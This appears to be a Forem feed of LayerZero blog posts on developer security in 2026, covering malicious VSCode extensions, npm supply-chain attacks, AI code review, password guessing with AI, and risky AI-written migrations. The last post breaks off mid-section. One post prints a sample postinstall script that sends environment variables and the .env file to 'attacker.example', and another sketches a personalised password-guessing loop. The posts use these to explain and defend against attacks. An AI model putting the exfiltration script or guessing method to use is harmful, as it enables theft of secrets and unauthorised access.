Forem: LayerZero

3,800 GitHub repos got breached by one VSCode extension. Here's the 5-minute audit that saves yours.

LayerZero — Thu, 21 May 2026 05:16:54 +0000

GitHub just confirmed it: one malicious VSCode extension exfiltrated tokens from 3,800 repositories. Not 38. Not 380. Three thousand eight hundred.

If you're a vibe coder who installs extensions to make your editor look cool or speed up boilerplate, this is the moment to read the rest of this post.

Because the worst part isn't that it happened. It's how boring the attack was.

What actually went down

The extension shipped as a normal productivity tool, passed marketplace review, and racked up installs. Then it shipped a quiet update. That update did three things:

Walked the user's filesystem looking for .env, .npmrc, .git/config, and ~/.aws/credentials
Read VSCode's own secret storage (where GITHUB_TOKEN, OPENAI_API_KEY, and friends often live)
POSTed everything to a server the attacker controlled

No zero-day. No exploit chain. No CVE. Just a published extension doing exactly what extensions are allowed to do — read your files.

That's the thing nobody tells you when you click Install: a VSCode extension has the same filesystem permissions you do.

Why this hits vibe coders harder than anyone

If you're building with AI, your laptop is a treasure chest:

Anthropic API key
OpenAI API key
Supabase service role key
A GitHub PAT with repo scope
Maybe a Stripe secret if you've shipped

All of it sits in .env files, all of it readable by any process running as you. Including the cute little "AI commit message generator" extension you installed last Tuesday.

The 3,800 breached repos weren't enterprise targets. They were side projects, indie SaaS, vibe-coded MVPs. The exact stuff this audience builds.

The 5-minute audit, in order

Stop reading and do these in your terminal. Right now.

1. List every extension you have installed

code --list-extensions --show-versions

Look for anything you don't remember installing. Anything with a publisher you can't immediately identify. Anything with under ~50k installs that you grabbed because a tweet recommended it.

Uninstall anything you can't justify in 5 seconds:

code --uninstall-extension some.suspicious-extension

2. Check what your extensions can see

VSCode extensions don't have a permission model. They get everything your user account has access to. There's no manifest.json listing which folders an extension can read. It can read all of them.

This is not a bug. This is the design.

The only mitigation is: don't install extensions you don't need, from publishers you don't know.

3. Rotate every secret in every `.env` on this machine

find ~/Desktop ~/Projects ~/code -name ".env*" -not -path "*/node_modules/*" 2>/dev/null

For every file that comes back, assume the contents leaked. Go to each provider's dashboard and rotate:

GitHub: Settings → Developer settings → Personal access tokens → revoke + reissue
Anthropic / OpenAI: revoke the keys, generate new ones, update .env
Supabase: rotate the service role key (this one is bad — it bypasses RLS)
AWS: rotate IAM access keys, audit CloudTrail for the last 30 days

Is this annoying? Yes. Is it cheaper than waking up to a $40k OpenAI bill from a crypto miner? Also yes.

4. Audit your GitHub for the actual breach signature

gh auth status
gh api /user/repos --paginate -q '.[] | select(.pushed_at > "2026-05-01") | .full_name'

Look at every repo pushed to recently. Check the commits. Are any of them yours that you don't remember? Any new collaborators? Any new deploy keys under Settings → Deploy keys?

This is the actual breach signature. Stolen tokens get used to add backdoors to private repos, then those backdoors siphon from production.

5. Set up a guardrail so this doesn't happen again

Move your secrets out of .env and into a secret manager — even a free one. direnv + 1Password CLI is the cheapest setup that doesn't leave plaintext on disk:

# .envrc (committed, no secrets in it)
export ANTHROPIC_API_KEY=$(op read "op://Personal/Anthropic/credential")
export GITHUB_TOKEN=$(op read "op://Personal/GitHub PAT/credential")

Now a malicious extension reading .env finds nothing useful. The secret lives encrypted in your vault and only decrypts in your shell session.

The non-obvious takeaway

The VSCode marketplace is not curated the way the iOS App Store is. The bar to publish is a free Microsoft account. Review is mostly automated. The trust model is "we'll catch the bad ones eventually" — and "eventually" was apparently 3,800 repos this time.

Every extension you install is a supply-chain dependency with full read access to your machine. Treat them like you'd treat a random npm package with one maintainer: install only what you need, prefer the ones with millions of downloads from publishers you can name, and audit periodically.

The "AI-everything" gold rush makes this worse, not better. Every week there's a new extension that promises to 10x your coding with some Claude or GPT-powered magic. Most of them are fine. Some of them are not. You won't be able to tell the difference until your bill arrives.

What to do tonight

Run the audit above. All 5 steps. Don't skip step 3.
Pick one project and move it from .env to op or aws-vault or doppler. Just one.
Set a calendar reminder for 30 days from now to do this audit again.

Following LayerZero — we break down the infrastructure that ships AI products without getting them breached. Next up: why .env was never meant for production secrets, and the 3-line setup that fixes it for vibe coders.

AI Gateway vs MCP Gateway vs Agent Gateway: Which One Do You Actually Need?

LayerZero — Mon, 18 May 2026 10:20:01 +0000

Three things are called "gateway" in your AI stack right now. They do completely different jobs.

If you're shipping AI features and trying to figure out whether you need an AI Gateway, an MCP Gateway, or an Agent Gateway — most blog posts will hand-wave and say "it depends." That's useless.

Here's the real difference, in the order you'll actually hit them.

1. AI Gateway — the proxy in front of model providers

An AI Gateway sits between your app and OpenAI / Anthropic / Google / Bedrock. It's the load balancer of LLM calls.

What it does:

Routing — fall back from Claude to GPT if one provider 5xx's
Rate limits & quotas — per-user, per-team, per-feature
Caching — semantic or exact-match
Cost tracking — per token, per route, per environment
Auth — strip your provider key, give each team a virtual key

// Without a gateway
const res = await openai.chat.completions.create({ ... });

// With a gateway (Portkey / LiteLLM / OpenRouter / Cloudflare AI Gateway)
const res = await fetch("https://gateway.yourcompany.com/v1/chat", {
  headers: { Authorization: `Bearer ${teamVirtualKey}` },
  body: JSON.stringify({ model: "claude-opus-4.7", messages })
});

If you have three or more teams calling LLMs and you can't answer "how much did the support team spend on Claude last month?" in 10 seconds, you need this.

2. MCP Gateway — the proxy in front of tool servers

Model Context Protocol (MCP) lets an LLM call tools — read a file, run SQL, hit a Notion page, send a Slack message. Each capability lives in an MCP server.

When you have 12 MCP servers, you have a problem:

Which user is allowed to call which tool?
Which prompts can invoke database.delete_row?
How do you audit every tool call?
How do you stop one runaway agent from racing through 400 calls/min?

An MCP Gateway is the policy layer in front of tools. Same idea as an API gateway, but the consumer is an LLM, and the requests are non-deterministic.

If you're letting AI act on production systems, the gateway is where you put the "are you sure?".

3. Agent Gateway — the proxy between agents

This one is newer. An Agent Gateway is what you put when agent-to-agent communication starts happening:

One agent dispatches to a specialist agent
A user's agent talks to a vendor's agent (A2A protocol territory)
You're running a multi-agent system and want a single audit log

It handles identity ("this agent represents user X, on tier Y"), permissions, and conversation routing. Less mature than the other two, but if you're building multi-agent workflows, this is the gap you'll hit next.

Which one do you actually need?

Start at the bottom of the stack and only add the next layer when it hurts:

Pain you feel	Layer to add
"I have no idea how much we spend on OpenAI"	AI Gateway
"An agent just deleted production data"	MCP Gateway
"I can't tell which agent called which agent"	Agent Gateway

Most teams need AI Gateway first, MCP Gateway when they connect tools to prod, and Agent Gateway only if they're going full multi-agent.

The non-obvious takeaway

These aren't competing — they're a stack. Calls go: App → AI Gateway → LLM → MCP Gateway → Tools → Agent Gateway → Other agents.

The mistake is buying "an agent platform" that bundles all three before you've felt the pain of any one of them. You end up with vendor lock-in for problems you don't have yet, and zero visibility into the problems you do.

Build the gateway you need today. Add the next one when the bill, the breach, or the audit forces you to.

Following LayerZero — we break down the infrastructure that ships AI products. Next up: why most teams set MCP permissions wrong, and the 3-line policy that fixes it.

One AI code review pass isn't enough. Here's the loop that actually catches bugs.

LayerZero — Sat, 16 May 2026 00:23:23 +0000

You ran the AI reviewer. It said "LGTM." You shipped. Then production caught fire.

This is happening more and more this year. Teams adopt Claude, Copilot, or Cursor for code review, get a clean response on the first pass, and merge with confidence they haven't earned.

Here's the part nobody is telling you: one pass of AI review is statistically worse than a tired human's first pass. Not because the model is dumb, but because of how reviewing works.

The good news is the fix is small. It just isn't "use a better model."

Why one pass fails

When an AI reviews a diff, it does roughly what a human does on the first read: scan for obvious smells. Wrong indentation. Unused vars. A missing await. The cheap stuff.

The expensive stuff — the bugs that cost you real money — lives somewhere else:

Cross-file invariants. A change in auth.ts quietly breaks an assumption in billing.ts.
Race conditions. Two requests can now hit the same row at the same time.
Silent regressions. A refactor preserves behavior in 99% of cases and corrupts data in the 1%.
Security holes that look like features. An ID is now passed in the URL because "the frontend needed it."

A single review pass treats the diff like a closed system. It cannot see what it cannot see. And the model, like a junior dev, gets one shot — then says "LGTM" because that is the polite default when nothing obvious is wrong.

That is the trap.

What a real review loop looks like

Think of it the way a senior engineer reviews: not one read, but five passes with different glasses on.

The AI version of that is just five prompts in a loop, each looking at the same diff with a different question:

Pass 1: "What does this PR actually change? Summarize behavior."
Pass 2: "What invariants in the rest of the codebase could this break?"
Pass 3: "What inputs would make this crash, hang, or corrupt data?"
Pass 4: "What does this leak? Auth, PII, secrets, internal IDs, error stacks."
Pass 5: "If this ships and is wrong, how do we find out? Are the logs/tests enough?"

Each pass is a fresh context window. No memory of "LGTM" from the last one. Each one is forced to find something or explicitly state "nothing applies."

Here's a minimal harness you can run today:

import anthropic

client = anthropic.Anthropic()
MODEL = "claude-opus-4-7"

PASSES = [
    ("behavior",  "Summarize what this diff changes in plain English."),
    ("impact",    "List specific files or functions OUTSIDE the diff that may break."),
    ("failure",   "Give 5 concrete inputs that would crash or corrupt data."),
    ("security",  "Find any new leak: auth, PII, secrets, internal IDs, stack traces."),
    ("observability", "If this is wrong in prod, how would we detect it? Are tests/logs enough?"),
]

def review(diff: str) -> dict[str, str]:
    findings = {}
    for name, question in PASSES:
        msg = client.messages.create(
            model=MODEL,
            max_tokens=1024,
            system="You are a senior engineer. Be concrete. No 'LGTM' allowed.",
            messages=[{
                "role": "user",
                "content": f"{question}\n\nDIFF:\n{diff}"
            }],
        )
        findings[name] = msg.content[0].text
    return findings

That's it. Five API calls. Costs a few cents. Catches the bugs a one-shot reviewer waves through.

The non-obvious part: forbid "LGTM"

The single most important line in that prompt is No 'LGTM' allowed.

LLMs default to agreement when nothing screams at them. You have to actively forbid the polite-out. Better prompts:

"You must list at least two concerns, even if they are minor. If the change is genuinely safe, explain why — don't just assert it."
"Rate severity 1-5. If everything is 1, justify it against the file's history."
"Imagine this PR ships and breaks. What is the post-mortem headline?"

These are not tricks. They are how you make the model do the work instead of pattern-matching to "approve."

What this fixes in your workflow

If you're a solo dev or small team shipping AI-assisted code at speed, the loop above does three things:

Forces the model to imagine failure. Most one-pass reviews implicitly assume success.
Spreads attention across the codebase. Cross-file bugs are where money dies.
Leaves an audit trail. Five named passes give you something to point to when something goes wrong — way better than one "LGTM" in your Git history.

The cost of running this in CI is real but small. A 200-line PR through 5 passes on Claude is roughly $0.10 today. The cost of not running it is one bad migration, one leaked admin endpoint, one corrupted invoice batch.

Do the math.

The deeper lesson

AI code review isn't broken. The way most teams use it is broken. They treat the model like an oracle that knows the answer and ask it once. The model is not an oracle. It's a junior engineer with infinite stamina and zero ego.

The right mental model is: use the AI like you'd run a code review checklist — multiple structured passes, different focus each time, never satisfied on the first "looks fine."

One pass is a sanity check. A loop is a review. Most of the bugs you care about live in the gap between those two things.

If this is the kind of practical AI-engineering content you want more of, follow LayerZero. We break down what actually changes in your workflow when you take AI tools seriously — not the hype, the parts that ship code or break it. Next post: why your CI should run the AI reviewer on its own PRs.

Claude just recovered $400K from a forgotten Bitcoin wallet. That's a security warning, not a magic trick.

LayerZero — Thu, 14 May 2026 16:23:41 +0000

A guy lost his Bitcoin password for 11 years. Last week, an AI got it back in an afternoon.

The story bouncing around Hacker News this week is too perfect: an old wallet.dat file from 2014, forgotten password, roughly $400,000 in BTC sitting frozen inside. The owner finally pointed Claude at it. The AI wrote a smart, context-aware brute-force script using everything it could infer about the owner's life. Hours later, the wallet was open.

Most coverage frames this as a feel-good AI win. It is not. It's a flashing red light for anyone who still thinks their old passwords are safe.

What actually happened (the part the headlines skip)

Claude didn't break SHA-256. It didn't crack elliptic-curve crypto. It did something much more mundane, and much more dangerous for you:

It wrote a targeted dictionary attack.

A real wallet brute-force at scale is impossible — the keyspace is too big. But humans don't pick from the full keyspace. They pick from their own brain: a pet's name, a birthday, the city they lived in, the keyboard pattern they always default to. Claude used the owner's notes, old hints, and biographical context to generate a candidate list with maybe a few million entries. Then a GPU chewed through them.

# What the attack roughly looks like — simplified
context = {
    "birth_year": 1987,
    "old_pets": ["Mochi", "Luna"],
    "hometown": "Sapporo",
    "likely_separators": ["!", "_", "1", ""],
    "caps_habits": ["first letter", "all", "none"],
}

for base in expand_personal_terms(context):
    for variant in mutate(base, context):
        if try_unlock(wallet, variant):
            return variant

The magic isn't the cryptography. The magic is that an LLM is now good enough to think like the password owner. That's a capability shift.

Why this is the real news

For a decade, the standard advice has been: "a strong password is one no human would guess." That advice is now obsolete. The new bar is: a strong password is one that even a model with access to your entire public footprint can't reconstruct.

That's a much, much higher bar.

Think about how much of your life a determined attacker can hand an LLM today:

Your LinkedIn (employers, dates, locations)
Your old Twitter/X posts (pet names, partner names, favorite bands)
Breached password dumps from sites you forgot you used in 2012
The 14-character pattern you reuse with small variations

An LLM can correlate all of it, generate a personalized wordlist that is small enough to brute-force, and grind through your old encrypted backups, your local keystore files, your .zip archives, your KeePass exports from before you started using a long passphrase.

The wallet recovery story is the friendly version. The unfriendly version is your ex's lawyer doing it. Or someone who pulled your old laptop out of an e-waste bin.

What changes for developers, this week

Three things, in order of how painful they are:

1. Stop encrypting things with human-memorable passwords.

Any file that needs to survive ten years — backups, wallet exports, password vault exports, encrypted archives of customer data — should be sealed with a 24+ character random string from a generator. Not a passphrase you can remember. A string you literally cannot type from memory.

# Generate a key your future self (and future Claude) can't guess
openssl rand -base64 32

Store that key somewhere a brute-force can't reach: a hardware key, a paper backup in a safe, a managed secret in a vault you control.

2. Audit your old encrypted files like they're already broken.

Do you have a backup-2018.zip somewhere with a password you remember? Assume it's open. Re-encrypt with a random key. Anything that contained credentials at the time — API keys, OAuth tokens, customer PII — rotate it now, not later. The keys might still work. Old AWS access keys from 2015 still authenticate in 2026 if nobody disabled them.

3. Treat your public footprint as part of your password.

This is the uncomfortable one. Every personal detail you post is now training data for the attacker who wants into your stuff. You don't have to go full hermit. You do have to stop using your dog's name and your kid's birth year as the seed for anything that protects money or customer data.

The deeper shift

For most of computing history, the gap between "a human guessing your password" and "a computer brute-forcing your password" was a chasm. Humans were slow and limited. Computers were fast but stupid — they tried password123, then password124, in dumb order.

LLMs collapse that gap. They are fast and they think like you. That combination didn't exist before, and most of our security habits were built assuming it never would.

The Bitcoin recovery story is fun. The implication is not. If a hobbyist with Claude and a GPU can open an 11-year-old wallet in an afternoon, then anything you encrypted with a guessable password — anywhere, ever — should be treated as a leak that hasn't happened yet.

You have time. The attackers are still mostly chasing $400K wallets, not your notes-backup-2017.zip. But "mostly" is doing a lot of work in that sentence, and the cost of running this kind of attack is dropping every month.

Fix it before someone else does it for you.

If this changed how you think about your old encrypted files, follow LayerZero. We break down how the internet actually works for developers shipping with AI — and what changes the moment AI gets good enough to think like an attacker.

Your next supply-chain attack will come from a package you've never heard of

LayerZero — Tue, 12 May 2026 05:32:16 +0000

Most developers think supply-chain attacks happen to other people. Then TanStack happened.

Last week, a popular npm package in the TanStack ecosystem was compromised. Attackers pushed a malicious version that exfiltrated environment variables from any machine that ran npm install during the window. Thousands of repos pulled it before anyone noticed.

If you're shipping with AI, you're shipping someone else's code. A lot of it.

The part nobody wants to admit

When Cursor or Claude Code adds a dependency, you almost never read what it does. You skim the README, glance at the GitHub stars, and run npm install. That's the workflow. That's also the attack surface.

Here's the actual chain:

Your app → 12 direct deps → 400 transitive deps → 4,000 maintainers worldwide
          → any one of them gets phished → your .env is gone

The TanStack incident wasn't sophisticated. The attacker didn't break crypto. They compromised one maintainer's npm token. That was enough.

What "compromised" actually means for you

Let's be concrete. A malicious postinstall script can do all of this before your terminal prompt comes back:

// postinstall.js — what a real attacker writes
const { execSync } = require('child_process');
const https = require('https');

const env = process.env;
const payload = JSON.stringify({
  env: env,
  cwd: process.cwd(),
  user: env.USER,
  // grab the entire .env file too
  dotenv: require('fs').readFileSync('.env', 'utf8'),
});

https.request('https://attacker.example/x', { method: 'POST' })
  .end(payload);

That's 12 lines. It runs the moment you install. By the time you see "added 1 package," your OpenAI key, your Stripe secret, and your database URL are already on someone else's server.

Three changes that actually move the needle

Most "supply-chain security" advice is theater. Audit logs you'll never read. SBOMs nobody parses. Here's what actually reduces blast radius:

1. Pin everything. Then verify the lockfile.

npm config set save-exact true
npm ci  # not npm install — ci fails if lockfile drifts

Exact versions don't prevent the first attack, but they stop the silent auto-upgrade that turns one compromised package into thousands of compromised apps.

2. Disable lifecycle scripts by default.

npm config set ignore-scripts true

This breaks some packages (anything that needs native compilation). That's a feature, not a bug. You'll learn which ones, and you'll vet them once instead of every install.

3. Stop putting production secrets in your dev .env.

This is the one that hurts. Your dev machine shouldn't have access to production Stripe. It shouldn't have the prod database URL. If a postinstall script reads your .env, the worst it should find is sandbox keys.

The uncomfortable truth

You cannot read every dependency. You can't even read 1% of them. The TanStack maintainers couldn't, and they wrote the library.

The defense isn't more reading. It's smaller blast radius. Pin versions. Kill postinstall. Keep prod secrets out of dev.

Do those three things this week and the next TanStack-style incident will cost you a git reset, not a customer notification email.

If this saved you a 2am Slack message, follow LayerZero. We break down how the internet actually works for developers who ship with AI.

AI Is Breaking Two Vulnerability Cultures — And Vibe Coders Are About to Get Caught in the Middle

LayerZero — Sat, 09 May 2026 00:20:58 +0000

Two security cultures used to coexist quietly. AI just broke both of them in the same quarter — and if you ship with Claude, Cursor, or Copilot, you are standing exactly where the fallout lands.

This isn't a researcher's problem. It's a shipping-velocity problem. Yours.

What the two cultures actually were

For twenty years the security world ran on two parallel economies.

Disclosure culture. A researcher finds a bug, tells the vendor, the vendor patches, a CVE goes out, everyone learns. Slow, gentlemanly, reputation-driven. It worked because the supply of researchers was small and the currency was credit, not cash.

Bounty culture. A platform pays researchers per bug. Supply scales with the budget. Bugs are graded. High-severity, high payout.

Both cultures shared one quiet assumption: the cost of finding a bug is roughly equal to the value of finding it. Researchers spent weeks for credit. Bounty rates matched effort. The economics balanced.

AI just broke that assumption.

What "broken" actually looks like

In the last six months, two things happened that older security folks are still processing:

1. AI-assisted vuln research collapsed the cost of finding low-hanging bugs. A solo researcher with an LLM-driven fuzzer and an afternoon can now triage a codebase that used to take a team a week. Cost per bug found is cratering. Value per bug found is not.

2. AI-assisted exploit development collapsed the cost of weaponizing them. Turning a bug into a working exploit used to require deep platform expertise. The gap between "found" and "weaponized" is now narrowing fast.

Put those together and you get a culture problem:

Disclosure culture assumed bugs trickle in. Vendors are buried. The 90-day disclosure window doesn't fit a world where one researcher files 40 bugs in a weekend.
Bounty culture assumed each bug took serious effort, so payouts were premium. Now anyone with $20/month of API credits can mass-submit. Programs are tightening criteria and quietly de-emphasizing volume.

Both cultures evolved for a world where vulnerability discovery was an artisanal craft. AI turned it into industrial output.

Why this lands on vibe coders specifically

Most security writers frame this as a researcher-vendor problem. It isn't. It's a problem for anyone who ships software with dependencies — which means you.

Three concrete consequences in 2026:

1. Your dependencies will get bug-bombed faster than maintainers can patch. That open-source library with one maintainer who answers issues on weekends is now attractive to AI-augmented researchers, scammers, and worms. CVEs in your tree will spike. Patch latency will spike harder.

2. The exploit window after a CVE drops is shrinking from weeks to hours. Used to be: CVE published, you had weeks before mass scanning started. Now: CVE published, AI scanners scrape it within hours and start probing every internet-facing service. Your "patch next sprint" timeline is obsolete.

3. Bug-bounty programs aren't going to save you. If your security strategy is "we'll know when researchers tell us," that's a strategy that assumed a researcher economy that's being squeezed from both sides.

What to actually do

Three things, in impact-to-effort order.

1. Patch high-severity on a 7-day clock, not a sprint clock

Automated dependency monitoring (Dependabot, Renovate, Snyk — pick one) and a 7-day patch SLA for anything CVSS 7+. Not "we'll get to it." A calendar deadline.

# .github/dependabot.yml
version: 2
updates:
  - package-ecosystem: "npm"
    directory: "/"
    schedule:
      interval: "daily"
    open-pull-requests-limit: 20
    labels: [security, urgent]

If a high-severity dep PR lives more than 7 days, that's a process failure.

2. Lock your supply chain in 30 minutes

You don't need an SBOM platform. You need three things:

Lockfile committed. package-lock.json, pnpm-lock.yaml, poetry.lock — committed, reviewed in PRs.
Pinned base images. Not node:latest. Not node:20. node:20.11.0-alpine3.19@sha256:....
A way to grep your dependency tree. pnpm why <package> or equivalent. If you can't answer "do I depend on left-pad" in 60 seconds, attackers have the advantage.

Half an hour of work. Moves you from "vulnerable to whatever the world found this morning" to "I have a fighting chance."

3. Assume your AI assistant will ship you a vulnerable line, and design for it

Your Claude/Cursor/Copilot session is going to introduce a SQL injection, an XSS, or a leaked secret eventually. Not because the AI is bad — because the AI is fast, and faster code shipped without review is the bug.

Add a pre-commit linter for the most common AI-introduced mistakes:

# .pre-commit-config.yaml
- repo: https://github.com/zricethezav/gitleaks
  rev: v8.18.0
  hooks:
    - id: gitleaks    # catches accidental secret commits
- repo: https://github.com/PyCQA/bandit
  rev: 1.7.5
  hooks:
    - id: bandit      # catches common Python security antipatterns

Blunt tools. They miss things. They also catch 80% of AI-generated mistakes in two seconds per commit. That's a deal you take.

The non-obvious takeaway

The disclosure-versus-bounty debate is a red herring. The real shift is this: security used to be artisanal on both sides — defense reactive, offense reactive. AI made offense industrial. Defense hasn't caught up.

If you wait for the security culture to figure itself out, you are betting that researchers, vendors, and bounty platforms will negotiate a new equilibrium before your stack gets bug-bombed. They will. But the negotiation will take years. Your CVE-to-exploit window is now hours.

The vibe coders who ship safely in 2026 won't be the ones who memorized OWASP. They'll be the ones who set up automated patch pipelines, locked their supply chain, and added 30 seconds of pre-commit checks — then went back to building.

The asymmetry is the point. Your attacker is using AI. Your defenses should too.

The business angle

If you sell software in 2026, your security posture is going to come up in deals. It used to be enterprise-only — "are you SOC2." Now SaaS buyers ask because they got burned and they remember.

When a B2B prospect asks "how do you handle vulnerabilities," the answer "we wait for researchers to tell us" is a deal-killer. "We patch high-severity CVEs in 7 days, lockfiles committed, pre-commit security linting" is a wedge — and it's two days of setup. Cheapest sales differentiator you'll find this quarter.

What to do today

Run npm audit, pip-audit, or bundle audit on your project right now. Count the high-severity issues. Set a calendar reminder for 7 days from today. Patch them by then. That's the bar — not "review and see what we can do." Patch them.

Then add Dependabot, then add gitleaks, then go ship.

Follow LayerZero for security and infrastructure that vibe coders can actually use. Next: the four supply-chain attacks that will hit npm and PyPI in 2026 — and the one-line guard that stops three of them.

Stop Letting AI Write Your Database Migrations

LayerZero — Wed, 06 May 2026 18:47:03 +0000

A vibe coder I follow lost two days of customer data last weekend.

Not from a hack. Not from a hardware failure. From a single AI-generated migration that a senior engineer would have caught in 10 seconds.

If you're shipping with Claude, Cursor, Copilot, or any agent that touches your schema, you need to read this before you run another migrate command.

What actually goes wrong

AI is genuinely good at writing application code. It pattern-matches against millions of similar codebases and produces plausible code fast. For most things — components, handlers, glue logic — that's enough. If it's wrong, you re-render. You re-run. You ship a fix.

Database migrations are different. They have one property the AI quietly ignores: they execute exactly once, and the wrong sequence is unrecoverable without a backup.

Three failure modes I've now seen in the wild:

1. Silent column drops. The AI "improves" a migration by removing what it thinks is a dead column. The column had three months of customer data. The migration runs in production. The column is gone. You restore from backup and lose everything written since the snapshot.

2. Type changes that truncate. Convert a TEXT to VARCHAR(255)? Sure, the AI will do that. The 12 customers whose addresses were 280 characters? Their addresses are now 255 characters and the suffix is in the trash bin.

3. Backwards-incompatible renames mid-deploy. The AI renames user_email to email because "it's cleaner." The old version of your app, still running on half your boxes during the rolling deploy, throws 500s for 90 seconds. Customers see them.

None of these are bugs in the AI. The AI did what you asked. The bug is that you're using AI like a junior dev who needs review, except the review never happened.

Why migrations are the worst case for AI

Most AI failures are recoverable. You ship a bad component, you redeploy the previous version. You commit a typo, you push a fix. The blast radius is contained to "the next 30 seconds of users."

Migrations break that pattern in three ways:

They modify shared, mutable state. Code is reproducible from git. Data is not.
They run irreversibly. "Down migrations" exist in theory. In practice, they don't roll back data deletes.
They touch every customer simultaneously. A bad migration is not a 5% bug. It's a 100% bug across your entire customer base in one transaction.

The combination — irreversibility, shared state, fanout — is exactly the property AI shouldn't be trusted with unsupervised. And yet it's the one most vibe coders trust it with the most, because writing migrations is boring and AI is happy to do boring work.

What "review" actually means for migrations

When I say "don't let AI run migrations unreviewed," I don't mean "skim the diff before clicking yes."

I mean this checklist, every time:

-- Before running ANY AI-generated migration, answer:

-- 1. What columns/tables does this DROP? (grep for DROP, ALTER ... DROP)
-- 2. What types does this CHANGE? (ALTER ... TYPE)
-- 3. What constraints does this ADD that could fail? (NOT NULL on existing column, UNIQUE)
-- 4. What renames does this do? (RENAME TO, RENAME COLUMN)
-- 5. Does this run in a transaction? (BEGIN / COMMIT?)
-- 6. Could this lock the table for more than 1 second on production data?

If you can't answer all six in 30 seconds, the migration isn't reviewed. It's been glanced at. Those are not the same thing.

Concrete defenses for vibe coders

You don't need to become a DBA. You need three guardrails.

1. Always run migrations on a production-clone first

Most managed Postgres providers (Supabase, Neon, Render) let you branch the database. Branch it, run the migration on the branch, run smoke tests. If it explodes, it explodes on the branch.

# Neon example
neon branches create --name migration-test
neon migrations apply --branch migration-test
# run tests against the branch
neon branches delete migration-test  # if it worked, apply to main

Five minutes of work. Catches 90% of disasters.

2. Forbid destructive operations in CI

Add a check to your migration pipeline that fails if the SQL contains certain keywords without an explicit override:

# In your CI, before applying migrations:
if grep -E "DROP COLUMN|DROP TABLE|ALTER.*TYPE" migrations/*.sql; then
  echo "Destructive migration detected. Set MIGRATION_DESTRUCTIVE_OK=1 to override."
  [ "$MIGRATION_DESTRUCTIVE_OK" = "1" ] || exit 1
fi

Now every destructive migration requires a deliberate human decision. The AI can't override it. You can't accidentally merge it. The friction is the feature.

3. Always back up immediately before applying

Every migration runner should have a "snapshot before apply" step. If it doesn't, write one:

# Before migrate:
pg_dump $DATABASE_URL > backup-$(date +%s).sql.gz
# Now apply:
npm run migrate

The backup is cheap. The peace of mind when something breaks is not.

The non-obvious takeaway

The actual lesson from every "AI broke production" incident isn't "AI is dangerous." It's "AI shifted the bottleneck from writing code to reviewing code, and most teams haven't noticed."

In 2024, your bottleneck was: how fast can I write this. Reviews were small because changes were small.

In 2026, your bottleneck is: how fast can I review what the AI wrote. The volume of AI-generated code is so high that review-quality is the new code-quality. If your review process for migrations is "looks plausible, ship it" — you have no review process.

The vibe coders who survive 2026 won't be the ones who stop using AI. They'll be the ones who built systems that compensate for unreviewed AI output — branched databases, destructive-op guards, automatic backups. They'll trust the AI for code and distrust it for state changes, and they'll build infrastructure that makes that distrust easy.

The business angle

If you're shipping a SaaS, your data is your business. Application code can be rewritten in a weekend. A corrupted customer table cannot. Every hour of "missing data" you have to explain to a B2B customer is an hour your churn risk goes up. The teams I see selling into enterprise in 2026 treat their migration pipeline as a product feature — not a CI afterthought — because their buyers ask about it.

If the answer to "how do you protect against bad AI-generated migrations" is a blank stare, that's a deal-killer. If the answer is "branched DB, destructive-op guard, automatic snapshot, human approval for destructive ops" — that's a wedge.

What to do today

Go check your last three migrations. Were they AI-generated? Were they reviewed against the six-point checklist above? If not, your runway from "vibe coder" to "outage" is shorter than you think.

Then add the three guardrails above to your project. It's an afternoon of work. The day you don't lose your customers' data because of it, you'll thank past-you.

Follow LayerZero for security and infrastructure that vibe coders can actually use. Next: why backups you can't restore are worse than no backups at all.

A Roblox Cheat + One AI Tool Took Down Vercel. Your Stack Is Probably Next.

LayerZero — Tue, 21 Apr 2026 05:13:07 +0000

A Roblox cheat.

That's what the story starts with. Not a nation-state APT, not a zero-day in the kernel, not some genius Stuxnet-grade payload. A cheat a teenager downloaded to get infinite Robux.

And one AI dev tool.

Together, that combo took Vercel's platform offline earlier this month. If you shipped anything on a preview URL that day, you remember. The post-mortem is still circulating in security channels and the pattern it exposes is quietly devastating — because almost every vibe-coded SaaS in 2026 is built the same way.

Let me walk you through what actually happened and why your stack is almost certainly vulnerable to the same class of attack.

What actually happened

Here's the chain, compressed:

A developer's personal machine got infected by a Roblox cheat bundled with an infostealer — the cheat was the candy, malware was the hook.
The infostealer grabbed session cookies and API tokens sitting in the developer's environment. Standard malware playbook — boring, effective.
One of those tokens belonged to an AI-powered development tool the developer had connected to their Vercel account. The tool had broad deploy and environment-variable permissions, because it needed them to "help you ship faster."
The attacker didn't even need to write exploit code. They fed the stolen token to the same AI tool and asked it, in plain English, to deploy malicious code and exfiltrate secrets across connected projects.
The tool, doing its job, fanned out. Because it was trusted. Because it had keys. Because nobody had modeled "what if the AI gets prompted by the wrong human?"

That's it. That's the whole attack. No CVE. No memory corruption. Just stolen credentials and an obedient AI with too much power.

Why this class of incident is about to explode

Every hot dev tool in 2026 is bolting on the same architecture:

An OAuth connection to GitHub, Vercel, Supabase, AWS.
A long-lived token stored locally or on a vendor server.
An AI agent that can take actions on your behalf.
Permission scopes that are effectively admin because scoping down "breaks the magic."

That's the same architecture as the Vercel breach. And it's sitting on tens of thousands of developer laptops right now.

The security community has a name for this failure mode: confused deputy. A trusted actor with broad privileges is tricked into using those privileges on behalf of an attacker. The AI tool wasn't compromised. It wasn't even misbehaving. It was doing exactly what it was told to do — by the wrong person, holding the right token.

The five mistakes every one of these incidents repeats

I've read a dozen post-mortems with the same skeleton. It's always one or more of these:

1. Over-scoped tokens. The AI tool needs read access to one project; you gave it write access to your entire org. Why? Because that was the default button in the consent screen and you were in a hurry.

2. No token expiry. OAuth refresh tokens that live forever. A token stolen in January still works in December. If a token can outlive a employee's tenure, it will.

3. No action auditing. You can't see what the AI tool did yesterday, let alone at 3am when it "helpfully" deployed a compromised build. No audit trail means no early detection.

4. No second factor on destructive actions. "Deploy to production," "add a new environment variable," and "grant access to another user" all execute with one token. A human admin would face a 2FA prompt. The AI faces nothing.

5. Single-machine trust boundary. Your dev laptop is also your production deployer, your database admin, and your secrets manager. One piece of malware collapses all of those at once.

Each one alone is manageable. Stacked, they become Vercel's Tuesday.

What to do this week — concrete actions, not fluff

Audit your AI tool permissions

Right now, open every AI dev tool you've connected — Claude Code, Cursor, Copilot Workspace, Devin, whatever. For each, check:

- Which orgs / repos / projects can this tool touch?
- What actions can it take? (read, write, deploy, admin)
- When was the token issued? Can I rotate it?
- Is there an audit log? Have I ever looked at it?

If you can't answer any of those in 30 seconds, assume the worst and revoke.

Move secrets off the laptop

